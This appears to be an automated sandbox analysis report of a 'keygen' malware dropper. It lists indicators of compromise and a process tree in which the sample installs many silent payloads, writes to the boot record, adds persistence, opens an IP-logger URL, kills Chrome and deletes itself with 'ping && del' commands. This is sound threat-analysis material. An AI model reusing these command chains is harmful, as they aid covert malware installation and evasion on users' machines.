affbdb72d9bb04067bfc87f579eba9637b165ea008ea7408bc8265f33c039bf60f506d245a6b53017afc8e161d70ed5b0d76576 Setup.exe -
Runs .reg file with regedit 2 IoCs
pid Process 3616 regedit.exe 6360 regedit.exe -
Runs ping.exe 1 TTPs 4 IoCs
pid Process 1748 PING.EXE 372 PING.EXE 2172 PING.EXE 1372 PING.EXE -
Script User-Agent 26 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 967 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 109 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 187 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 246 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 338 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 852 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 854 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1064 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1093 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1300 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1460 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 117 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 362 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 677 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 682 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 856 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1017 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1174 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1545 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 797 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 923 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 948 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1186 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1385 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1455 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 1468 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2208 file.exe 2208 file.exe 2208 file.exe 2208 file.exe 2208 file.exe 2208 file.exe 2208 file.exe 2208 file.exe 4056 41C2.tmp.exe 4056 41C2.tmp.exe 2140 1615014376525.exe 2140 1615014376525.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 2580 1615014382432.exe 2580 1615014382432.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe 1960 multitimer.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2208 file.exe Token: SeShutdownPrivilege 212 msiexec.exe Token: SeIncreaseQuotaPrivilege 212 msiexec.exe Token: SeSecurityPrivilege 4092 msiexec.exe Token: SeCreateTokenPrivilege 212 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 212 msiexec.exe Token: SeLockMemoryPrivilege 212 msiexec.exe Token: SeIncreaseQuotaPrivilege 212 msiexec.exe Token: SeMachineAccountPrivilege 212 msiexec.exe Token: SeTcbPrivilege 212 msiexec.exe Token: SeSecurityPrivilege 212 msiexec.exe Token: SeTakeOwnershipPrivilege 212 msiexec.exe Token: SeLoadDriverPrivilege 212 msiexec.exe Token: SeSystemProfilePrivilege 212 msiexec.exe Token: SeSystemtimePrivilege 212 msiexec.exe Token: SeProfSingleProcessPrivilege 212 msiexec.exe Token: SeIncBasePriorityPrivilege 212 msiexec.exe Token: SeCreatePagefilePrivilege 212 msiexec.exe Token: SeCreatePermanentPrivilege 212 msiexec.exe Token: SeBackupPrivilege 212 msiexec.exe Token: SeRestorePrivilege 212 msiexec.exe Token: SeShutdownPrivilege 212 msiexec.exe Token: SeDebugPrivilege 212 msiexec.exe Token: SeAuditPrivilege 212 msiexec.exe Token: SeSystemEnvironmentPrivilege 212 msiexec.exe Token: SeChangeNotifyPrivilege 212 msiexec.exe Token: SeRemoteShutdownPrivilege 212 msiexec.exe Token: SeUndockPrivilege 212 msiexec.exe Token: SeSyncAgentPrivilege 212 msiexec.exe Token: SeEnableDelegationPrivilege 212 msiexec.exe Token: SeManageVolumePrivilege 212 msiexec.exe Token: SeImpersonatePrivilege 212 msiexec.exe Token: SeCreateGlobalPrivilege 212 msiexec.exe Token: SeCreateTokenPrivilege 212 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 212 msiexec.exe Token: SeLockMemoryPrivilege 212 msiexec.exe Token: SeIncreaseQuotaPrivilege 212 msiexec.exe Token: SeMachineAccountPrivilege 212 msiexec.exe Token: SeTcbPrivilege 212 msiexec.exe Token: SeSecurityPrivilege 212 msiexec.exe Token: SeTakeOwnershipPrivilege 212 msiexec.exe Token: SeLoadDriverPrivilege 212 msiexec.exe Token: SeSystemProfilePrivilege 212 msiexec.exe Token: SeSystemtimePrivilege 212 msiexec.exe Token: SeProfSingleProcessPrivilege 212 msiexec.exe Token: SeIncBasePriorityPrivilege 212 msiexec.exe Token: SeCreatePagefilePrivilege 212 msiexec.exe Token: SeCreatePermanentPrivilege 212 msiexec.exe Token: SeBackupPrivilege 212 msiexec.exe Token: SeRestorePrivilege 212 msiexec.exe Token: SeShutdownPrivilege 212 msiexec.exe Token: SeDebugPrivilege 212 msiexec.exe Token: SeAuditPrivilege 212 msiexec.exe Token: SeSystemEnvironmentPrivilege 212 msiexec.exe Token: SeChangeNotifyPrivilege 212 msiexec.exe Token: SeRemoteShutdownPrivilege 212 msiexec.exe Token: SeUndockPrivilege 212 msiexec.exe Token: SeSyncAgentPrivilege 212 msiexec.exe Token: SeEnableDelegationPrivilege 212 msiexec.exe Token: SeManageVolumePrivilege 212 msiexec.exe Token: SeImpersonatePrivilege 212 msiexec.exe Token: SeCreateGlobalPrivilege 212 msiexec.exe Token: SeCreateTokenPrivilege 212 msiexec.exe Token: SeAssignPrimaryTokenPrivilege 212 msiexec.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 212 msiexec.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
pid Process 1728 Setup.exe 3484 C0CA61A12E4C8B38.exe 3196 C0CA61A12E4C8B38.exe 3644 firefox.exe 2140 1615014376525.exe 2412 firefox.exe 2580 1615014382432.exe 4316 prolab.tmp 4344 1615014388650.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3888 wrote to memory of 2208 3888 keygen-step-4.exe 75 PID 3888 wrote to memory of 2208 3888 keygen-step-4.exe 75 PID 3888 wrote to memory of 2208 3888 keygen-step-4.exe 75 PID 2208 wrote to memory of 2500 2208 file.exe 78 PID 2208 wrote to memory of 2500 2208 file.exe 78 PID 2208 wrote to memory of 2500 2208 file.exe 78 PID 2500 wrote to memory of 4056 2500 41C2.tmp.exe 82 PID 2500 wrote to memory of 4056 2500 41C2.tmp.exe 82 PID 2500 wrote to memory of 4056 2500 41C2.tmp.exe 82 PID 2500 wrote to memory of 4056 2500 41C2.tmp.exe 82 PID 2500 wrote to memory of 4056 2500 41C2.tmp.exe 82 PID 2500 wrote to memory of 4056 2500 41C2.tmp.exe 82 PID 2500 wrote to memory of 4056 2500 41C2.tmp.exe 82 PID 2500 wrote to memory of 4056 2500 41C2.tmp.exe 82 PID 2500 wrote to memory of 4056 2500 41C2.tmp.exe 82 PID 2500 wrote to memory of 4056 2500 41C2.tmp.exe 82 PID 2500 wrote to memory of 4056 2500 41C2.tmp.exe 82 PID 2500 wrote to memory of 4056 2500 41C2.tmp.exe 82 PID 2500 wrote to memory of 4056 2500 41C2.tmp.exe 82 PID 2208 wrote to memory of 3820 2208 file.exe 83 PID 2208 wrote to memory of 3820 2208 file.exe 83 PID 2208 wrote to memory of 3820 2208 file.exe 83 PID 3888 wrote to memory of 1728 3888 keygen-step-4.exe 85 PID 3888 wrote to memory of 1728 3888 keygen-step-4.exe 85 PID 3888 wrote to memory of 1728 3888 keygen-step-4.exe 85 PID 3820 wrote to memory of 1748 3820 cmd.exe 86 PID 3820 wrote to memory of 1748 3820 cmd.exe 86 PID 3820 wrote to memory of 1748 3820 cmd.exe 86 PID 1728 wrote to memory of 212 1728 Setup.exe 87 PID 1728 wrote to memory of 212 1728 Setup.exe 87 PID 1728 wrote to memory of 212 1728 Setup.exe 87 PID 4092 wrote to memory of 4064 4092 msiexec.exe 89 PID 4092 wrote to memory of 4064 4092 msiexec.exe 89 PID 4092 wrote to memory of 4064 4092 msiexec.exe 89 PID 1728 wrote to memory of 3484 1728 Setup.exe 90 PID 1728 wrote to memory of 3484 1728 Setup.exe 90 PID 1728 wrote to memory of 3484 1728 Setup.exe 90 PID 1728 wrote to memory of 3196 1728 Setup.exe 91 PID 1728 wrote to memory of 3196 1728 Setup.exe 91 PID 1728 wrote to memory of 3196 1728 Setup.exe 91 PID 1728 wrote to memory of 4088 1728 Setup.exe 92 PID 1728 wrote to memory of 4088 1728 Setup.exe 92 PID 1728 wrote to memory of 4088 1728 Setup.exe 92 PID 3888 wrote to memory of 3172 3888 keygen-step-4.exe 93 PID 3888 wrote to memory of 3172 3888 keygen-step-4.exe 93 PID 4088 wrote to memory of 372 4088 cmd.exe 95 PID 4088 wrote to memory of 372 4088 cmd.exe 95 PID 4088 wrote to memory of 372 4088 cmd.exe 95 PID 3172 wrote to memory of 3356 3172 Install.exe 96 PID 3172 wrote to memory of 3356 3172 Install.exe 96 PID 3888 wrote to memory of 2484 3888 keygen-step-4.exe 97 PID 3888 wrote to memory of 2484 3888 keygen-step-4.exe 97 PID 3888 wrote to memory of 2484 3888 keygen-step-4.exe 97 PID 2484 wrote to memory of 2984 2484 askinstall20.exe 98 PID 2484 wrote to memory of 2984 2484 askinstall20.exe 98 PID 2484 wrote to memory of 2984 2484 askinstall20.exe 98 PID 2984 wrote to memory of 1224 2984 cmd.exe 100 PID 2984 wrote to memory of 1224 2984 cmd.exe 100 PID 2984 wrote to memory of 1224 2984 cmd.exe 100 PID 3484 wrote to memory of 3644 3484 C0CA61A12E4C8B38.exe 101 PID 3484 wrote to memory of 3644 3484 C0CA61A12E4C8B38.exe 101 PID 3484 wrote to memory of 3644 3484 C0CA61A12E4C8B38.exe 101 PID 3484 wrote to memory of 3644 3484 C0CA61A12E4C8B38.exe 101 PID 3484 wrote to memory of 3644 3484 C0CA61A12E4C8B38.exe 101
Processes
-
C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:3888 -
C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Modifies system certificate store
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Users\Admin\AppData\Roaming\41C2.tmp.exe"C:\Users\Admin\AppData\Roaming\41C2.tmp.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Users\Admin\AppData\Roaming\41C2.tmp.exe"C:\Users\Admin\AppData\Roaming\41C2.tmp.exe"4⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:4056
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\file.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:3820 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.14⤵
- Runs ping.exe
PID:1748
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"2⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1728 -
C:\Windows\SysWOW64\msiexec.exemsiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"3⤵
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:212
-
-
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exeC:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 0011 installp13⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetThreadContext
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3484 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"4⤵
- Suspicious use of SetWindowsHookEx
PID:3644
-
-
C:\Users\Admin\AppData\Roaming\1615014376525.exe"C:\Users\Admin\AppData\Roaming\1615014376525.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615014376525.txt"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2140
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"4⤵
- Suspicious use of SetWindowsHookEx
PID:2412
-
-
C:\Users\Admin\AppData\Roaming\1615014382432.exe"C:\Users\Admin\AppData\Roaming\1615014382432.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615014382432.txt"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:2580
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"4⤵PID:4316
-
-
C:\Users\Admin\AppData\Roaming\1615014388650.exe"C:\Users\Admin\AppData\Roaming\1615014388650.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615014388650.txt"4⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4344
-
-
C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exeC:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"4⤵PID:3620
-
-
C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe" -StartTP4⤵PID:3172
-
-
C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exeC:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe /silent4⤵PID:6824
-
C:\Users\Admin\AppData\Local\Temp\is-2G9P6.tmp\23E04C4F32EF2158.tmp"C:\Users\Admin\AppData\Local\Temp\is-2G9P6.tmp\23E04C4F32EF2158.tmp" /SL5="$2048A,762308,115712,C:\Users\Admin\AppData\Local\Temp\23E04C4F32EF2158.exe" /silent5⤵PID:4628
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/14Zhe7"6⤵PID:1040
-
-
C:\Program Files (x86)\DTS\seed.sfx.exe"C:\Program Files (x86)\DTS\seed.sfx.exe" -pX7mdks39WE0 -s16⤵PID:3924
-
C:\Program Files (x86)\Seed Trade\Seed\seed.exe"C:\Program Files (x86)\Seed Trade\Seed\seed.exe"7⤵PID:6972
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"4⤵PID:7532
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 35⤵
- Runs ping.exe
PID:1372
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exeC:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe 200 installp13⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
- Suspicious use of SetWindowsHookEx
PID:3196 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe4⤵PID:2588
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe5⤵
- Kills process with taskkill
PID:740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\C0CA61A12E4C8B38.exe"4⤵PID:3736
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 35⤵
- Runs ping.exe
PID:2172
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 34⤵
- Runs ping.exe
PID:372
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3172 -
C:\Users\Admin\AppData\Local\Temp\M6V90HSJK4\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\M6V90HSJK4\multitimer.exe" 0 3060197d33d91c80.94013368 0 1013⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:3356 -
C:\Users\Admin\AppData\Local\Temp\M6V90HSJK4\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\M6V90HSJK4\multitimer.exe" 1 3.1615014594.60432ac2091c9 1014⤵
- Executes dropped EXE
- Adds Run key to start application
PID:2924 -
C:\Users\Admin\AppData\Local\Temp\M6V90HSJK4\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\M6V90HSJK4\multitimer.exe" 2 3.1615014594.60432ac2091c95⤵
- Executes dropped EXE
- Checks for any installed AV software in registry
- Maps connected drives based on registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
PID:1960 -
C:\Users\Admin\AppData\Local\Temp\rxwgbknqu0u\vict.exe"C:\Users\Admin\AppData\Local\Temp\rxwgbknqu0u\vict.exe" /VERYSILENT /id=5356⤵PID:4564
-
C:\Users\Admin\AppData\Local\Temp\is-OCBSP.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-OCBSP.tmp\vict.tmp" /SL5="$301F4,870426,780800,C:\Users\Admin\AppData\Local\Temp\rxwgbknqu0u\vict.exe" /VERYSILENT /id=5357⤵PID:4876
-
-
-
C:\Users\Admin\AppData\Local\Temp\jivgl1xuyn4\safebits.exe"C:\Users\Admin\AppData\Local\Temp\jivgl1xuyn4\safebits.exe" /S /pubid=1 /subid=4516⤵PID:4556
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\DragonFruitSoftware\tmorgm.dll",tmorgm C:\Users\Admin\AppData\Local\Temp\jivgl1xuyn4\safebits.exe7⤵PID:5636
-
-
-
C:\Users\Admin\AppData\Local\Temp\1dhfpscsjws\sspltvlam4o.exe"C:\Users\Admin\AppData\Local\Temp\1dhfpscsjws\sspltvlam4o.exe" /VERYSILENT6⤵PID:4596
-
C:\Users\Admin\AppData\Local\Temp\is-6027E.tmp\sspltvlam4o.tmp"C:\Users\Admin\AppData\Local\Temp\is-6027E.tmp\sspltvlam4o.tmp" /SL5="$1022E,870426,780800,C:\Users\Admin\AppData\Local\Temp\1dhfpscsjws\sspltvlam4o.exe" /VERYSILENT7⤵PID:4888
-
-
-
C:\Users\Admin\AppData\Local\Temp\rn5pdbb0nrv\yozvzfgirqj.exe"C:\Users\Admin\AppData\Local\Temp\rn5pdbb0nrv\yozvzfgirqj.exe" 57a764d042bf86⤵PID:4708
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k "C:\Program Files\J4PI14RFP3\J4PI14RFP.exe" 57a764d042bf8 & exit7⤵PID:5920
-
C:\Program Files\J4PI14RFP3\J4PI14RFP.exe"C:\Program Files\J4PI14RFP3\J4PI14RFP.exe" 57a764d042bf88⤵PID:4808
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\prv0skbobj5\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\prv0skbobj5\Setup3310.exe" /Verysilent /subid=5776⤵PID:4696
-
C:\Users\Admin\AppData\Local\Temp\is-14KLB.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-14KLB.tmp\Setup3310.tmp" /SL5="$20226,802346,56832,C:\Users\Admin\AppData\Local\Temp\prv0skbobj5\Setup3310.exe" /Verysilent /subid=5777⤵PID:4836
-
-
-
C:\Users\Admin\AppData\Local\Temp\nxvv12hvwik\ghr1p3sejjt.exe"C:\Users\Admin\AppData\Local\Temp\nxvv12hvwik\ghr1p3sejjt.exe" testparams6⤵PID:4720
-
C:\Users\Admin\AppData\Roaming\uixypn1nshu\moyah0k4v2a.exe"C:\Users\Admin\AppData\Roaming\uixypn1nshu\moyah0k4v2a.exe" /VERYSILENT /p=testparams7⤵PID:5748
-
-
-
C:\Users\Admin\AppData\Local\Temp\ezzpyg5m4dw\vpn.exe"C:\Users\Admin\AppData\Local\Temp\ezzpyg5m4dw\vpn.exe" /silent /subid=4826⤵PID:4768
-
C:\Users\Admin\AppData\Local\Temp\is-S638F.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-S638F.tmp\vpn.tmp" /SL5="$1023C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\ezzpyg5m4dw\vpn.exe" /silent /subid=4827⤵PID:5052
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "8⤵PID:4036
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap09019⤵PID:5244
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "8⤵PID:5328
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap09019⤵PID:6268
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall8⤵PID:7060
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install8⤵PID:7464
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0mycpgirvyk\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\0mycpgirvyk\askinstall24.exe"6⤵PID:4804
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵PID:5156
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
PID:5992
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\v3alus5hiqn\tcwg1yr12wc.exe"C:\Users\Admin\AppData\Local\Temp\v3alus5hiqn\tcwg1yr12wc.exe" /ustwo INSTALL6⤵PID:4956
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 6567⤵
- Program crash
PID:4368
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 6447⤵
- Program crash
PID:368
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 7247⤵
- Program crash
PID:3792
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 8207⤵
- Program crash
PID:5216
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 8767⤵
- Program crash
PID:5184
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 9447⤵
- Program crash
PID:5028
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4956 -s 10807⤵
- Program crash
PID:5380
-
-
-
C:\Users\Admin\AppData\Local\Temp\wx4ao4zcj2u\app.exe"C:\Users\Admin\AppData\Local\Temp\wx4ao4zcj2u\app.exe" /8-236⤵PID:4120
-
C:\Program Files (x86)\Shy-Morning\7za.exe"C:\Program Files (x86)\Shy-Morning\7za.exe" e -p154.61.71.51 winamp-plugins.7z7⤵PID:5388
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ""C:\Program Files (x86)\Shy-Morning\app.exe" -map "C:\Program Files (x86)\Shy-Morning\WinmonProcessMonitor.sys""7⤵PID:7296
-
C:\Program Files (x86)\Shy-Morning\app.exe"C:\Program Files (x86)\Shy-Morning\app.exe" -map "C:\Program Files (x86)\Shy-Morning\WinmonProcessMonitor.sys"8⤵PID:7532
-
-
-
C:\Program Files (x86)\Shy-Morning\7za.exe"C:\Program Files (x86)\Shy-Morning\7za.exe" e -p154.61.71.51 winamp.7z7⤵PID:7780
-
-
C:\Program Files (x86)\Shy-Morning\app.exe"C:\Program Files (x86)\Shy-Morning\app.exe" /8-237⤵PID:8124
-
-
-
C:\Users\Admin\AppData\Local\Temp\aespuai3xt5\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\aespuai3xt5\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq6⤵PID:3064
-
-
C:\Users\Admin\AppData\Local\Temp\si5vnkqhco4\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\si5vnkqhco4\chashepro3.exe" /VERYSILENT6⤵PID:4796
-
-
C:\Users\Admin\AppData\Local\Temp\cpb4s4ekag0\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\cpb4s4ekag0\Setup3310.exe" /Verysilent /subid=5776⤵PID:6048
-
C:\Users\Admin\AppData\Local\Temp\is-782L8.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-782L8.tmp\Setup3310.tmp" /SL5="$605E6,802346,56832,C:\Users\Admin\AppData\Local\Temp\cpb4s4ekag0\Setup3310.exe" /Verysilent /subid=5777⤵PID:6640
-
C:\Users\Admin\AppData\Local\Temp\is-9LRE6.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-9LRE6.tmp\Setup.exe" /Verysilent8⤵PID:4948
-
C:\Users\Admin\AppData\Local\Temp\is-3G4UK.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-3G4UK.tmp\Setup.tmp" /SL5="$2065E,802346,56832,C:\Users\Admin\AppData\Local\Temp\is-9LRE6.tmp\Setup.exe" /Verysilent9⤵PID:2488
-
C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\ProPlugin.exe"C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\ProPlugin.exe" /Verysilent10⤵PID:6272
-
C:\Users\Admin\AppData\Local\Temp\is-IJKLQ.tmp\ProPlugin.tmp"C:\Users\Admin\AppData\Local\Temp\is-IJKLQ.tmp\ProPlugin.tmp" /SL5="$10782,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\ProPlugin.exe" /Verysilent11⤵PID:4992
-
C:\Users\Admin\AppData\Local\Temp\is-MHEEU.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-MHEEU.tmp\Setup.exe"12⤵PID:4416
-
C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX2\main.exe"13⤵PID:4240
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\PictureLAb.exe"C:\Users\Admin\AppData\Local\Temp\is-PV1SE.tmp\PictureLAb.exe" /Verysilent10⤵PID:6544
-
